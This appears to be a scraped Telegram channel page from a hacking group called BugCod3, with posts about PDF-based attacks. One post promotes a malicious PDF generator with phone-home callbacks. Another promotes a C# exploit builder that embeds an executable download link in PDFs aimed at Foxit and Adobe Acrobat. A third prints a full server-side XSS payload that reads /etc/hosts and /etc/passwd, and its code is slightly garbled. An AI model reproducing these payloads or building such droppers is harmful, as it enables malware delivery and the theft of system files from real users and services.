BugCod3
6.19K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
Download Telegram
Malicious PDF Generator ☠️

Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

Usage

┌──(BugCod3㉿kali)-[~]
└─$
python3 malicious-pdf.py burp-collaborator-url

Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.

Purpose

⚪️ Test web pages/services accepting PDF-files
⚪️ Test security products
⚪️ Test PDF readers
⚪️ Test PDF converters

GitHub

#RedTeam #PDF #Pentesting

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥4
🥩 PDF

#Wordlist #PDF

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
22🔥1
🔥 PDF-BUILDER (POC) - (Non Silent) 🔥

💬
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).

💻 Usage:
Put your exe-link and build the PDF-FILE

😸 Github

⬇️ Download
🔒 BugCod3

#C #PDF #Exploit

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥32👎2
XSS to Exfiltrate Data from PDFs

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};https://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};https://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥321